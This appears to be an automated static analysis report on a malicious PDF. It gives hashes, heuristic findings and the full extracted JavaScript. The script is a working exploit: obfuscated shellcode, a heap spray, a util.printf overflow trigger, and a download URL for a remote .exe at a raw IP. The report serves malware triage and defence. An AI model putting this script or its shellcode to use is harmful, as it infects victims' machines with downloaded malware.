Malicious PDF — malware analysis report

Static analysis result for SHA-256 2ccb83d1c1d5d6a0…

MALICIOUS

PDF

3.0 KB Created: 2008-08-03 07:51:49 -09:03 Authoring application: Adobe InDesign CS3 (5.0) (via Adobe PDF Library 8.1) First seen: 2026-05-10
MD5: 725f5865ba403bf8372f69af63b7cbc1 SHA-1: 01a7952b8743f916675cf5475e5b3ed79f760013 SHA-256: 2ccb83d1c1d5d6a00e2d47b74ca404084cb7fe652a3588a8f677ee1b44ea3225
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF document contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream is obfuscated, as evidenced by the PDF_UNESCAPE heuristic firing on an unescape() call. This obfuscation suggests an attempt to hide malicious code, likely for downloading and executing a secondary payload. The presence of obfuscated JavaScript within a PDF is a common delivery mechanism for malware.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    GujwtS6J0N = unescape(""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://67.215.246.138/a12/aff_12.exe?u=&spl=p1 Referenced by PDF JavaScript

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x35B 2639 bytes
SHA-256: c065777f1185930f2aab3d13e509dbe31f28a0422719b61144f91d774a0e8856
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function SDIPtq0() {
var eE1e3GGTKK4FHH = "http://67.215.246.138/a12/aff_12.exe?u=&spl=p1";
var Z3goyJcBcp = '';
   function abrvalg(arg) {
      var out = "";
      for (var i=0; i<arg.length;i=i+4) {
         var br1 = parseInt('0x'+arg[i] + arg[i+1], 16).toString(16);
         var br2 = parseInt('0x'+arg[i+2] + arg[i+3], 16).toString(16);
         if(br2.length == 1) { br2 = "0" + br2; };
         if(br1.length == 1) { br1 = "0" + br1; };
         out = out + "%u" + br1 + br2;
      }
      return out;
  }
	
for (i = 0; i < eE1e3GGTKK4FHH.length; ) 
{
Z3goyJcBcp += '%u' + ((i+1<eE1e3GGTKK4FHH.length)?eE1e3GGTKK4FHH.charCodeAt(i+1).toString(16):'00')+eE1e3GGTKK4FHH.charCodeAt(i).toString(16);	
i = i + 2;
}

GujwtS6J0N = unescape(""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
"bfaze805xffecfffrf8b7fdf4eefef64efe3af9f"+
"6442f39zf64x6ee7erf03ezfeb64efb9036187e1a"+
"10z703ef11efefaa66b9zeb7787651107e1ef1f"+
"efefaa66bz9e7ca871r05f072defz0defefaa66b"+
"9e391870dx37079cef3rbefefaa66zb9ff2e870a"+
"960757ef29ezfefaa66arxffbd76f9a2c6615f7a"+
"ae806efeeb1ezf9a6664crbebaaexe8564b6f7ba"+
("07b9ef64efef87zbff5d9r9fxcz07807efef66eff").replace(new RegExp(/[zxswqr]/g),"")+
"3aa2ax6z42f6c66bfcfaa10rz87efefbfefaa6485"+
"fbb6edxba6407zf7ef8eefefraaexc28cfb3efc19"+
"1288raexbaf8a97efef9a10z64rcfe3xaaee8564b6"+
"f7baarzfx07efef85efb7exz8aaecdccbbc3410bcc"+
"f9axbcrbfaa648z5f3b6eabxa6407f7zefccefefef"+
"859xa1zr064cfe7aaed8564b6zf7baff07efef85e"+
"f64exfffraaee856z4b6f7baef07efefaeefbdb4"+
"0eec0xeecr0eec0eecz036cb5eb64bcz0d35bd180"+
"f1064bxa64rz03e792b264b9e39c6464d3f19bec"+
"97b91c9x964rzeccfdc1ca62642ae2cecdcb9e01"+
"9ff511dd5e7xr9b212zeece2af1d1ez0411d49ab1"+
"b50a0464b564erccb8932e36464a4zf3b532ece"+
"b64xec64b12a2xrdb2zefe71b071011zba10a3bda0a2efa1"
).replace(new RegExp(/[zxswqr]/g),"")));

home = unescape(Z3goyJcBcp);

runnable = GujwtS6J0N+home;
skipper = unescape(abrvalg(("0zx505"+"w0r5q0qq5").replace(new RegExp(/[zxswqr]/g),"")));

while (skipper.length<20+runnable.length)
{
	skipper+=skipper;
}

skipper1 = skipper.substring(0, 20+runnable.length);
skipper2 = skipper.substring(0, skipper.length-20-runnable.length);

while(skipper2.length<(0x40000-20-runnable.length))
{
	skipper2 += skipper2;
	skipper2 += skipper1;//skipper2 = skipper2+skipper2+skipper1;
}

context = new Array();
ii=-1;

while(++ii<1414)
{
	context[ii] = skipper2 + runnable;
}

var n2m2 = 12;
for(i = 0; i < 18; i++){ n2m2 = n2m2 + "9"; }
for(i = 0; i < 276; i++){ n2m2 = n2m2 + "8"; }
var str = "l25k34u35d30u30d30l66";
var fyt = unescape(str.replace(new RegExp(/[lkud]/g),"%"));
var fmck = util;
fmck.printf(fyt, n2m2);
	};

Open this report in the interactive analyzer, or submit your own file for analysis.